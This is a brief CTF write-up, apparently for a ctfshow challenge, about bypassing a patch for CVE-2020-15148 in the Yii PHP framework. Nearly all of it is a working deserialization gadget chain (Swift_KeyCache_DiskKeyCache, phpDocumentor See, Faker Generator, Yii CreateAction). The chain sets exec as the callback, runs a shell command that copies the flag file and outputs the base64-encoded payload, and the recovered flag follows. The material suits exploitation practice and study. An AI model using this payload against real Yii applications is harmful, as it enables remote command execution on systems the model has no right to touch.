PHP/7.3.11框架审计CVE-2020-15148Yii登录前补丁绕过
    思路类似 web267,估计是打过补丁版本

    poc2

    1. <?php
    2. namespace yii\rest{
    3.     class CreateAction{
    4.         public $checkAccess;
    5.         public $id;
    7.         public function __construct(){
    8.             $this->checkAccess = 'exec';
    9.             $this->id = 'cp /fla* tari.txt';
    10.         }
    11.     }
    12. }
    14. namespace Faker{
    15.     use yii\rest\CreateAction;
    17.     class Generator{
    18.         protected $formatters;
    20.         public function __construct(){
    21.             $this->formatters['render'] = [new CreateAction(), 'run'];
    22.         }
    23.     }
    24. }
    26. namespace phpDocumentor\Reflection\DocBlock\Tags{
    28.     use Faker\Generator;
    30.     class See{
    31.         protected $description;
    32.         public function __construct()
    33.         {
    34.             $this->description = new Generator();
    35.         }
    36.     }
    37. }
    38. namespace{
    39.     use phpDocumentor\Reflection\DocBlock\Tags\See;
    40.     class Swift_KeyCache_DiskKeyCache{
    41.         private $keys = [];
    42.         private $path;
    43.         public function __construct()
    44.         {
    45.             $this->path = new See;
    46.             $this->keys = array(
    47.                 // 有就行
    48.                 "suiyi"=>array("suiyi"=>"suiyi")
    49.             );
    50.         }
    51.     }
    52.     echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
    53. }
    54. ?>

    image.png

    image.png
    flag
    ctfshow{b95c815a-ec56-47ac-8da0-ca240539abe3}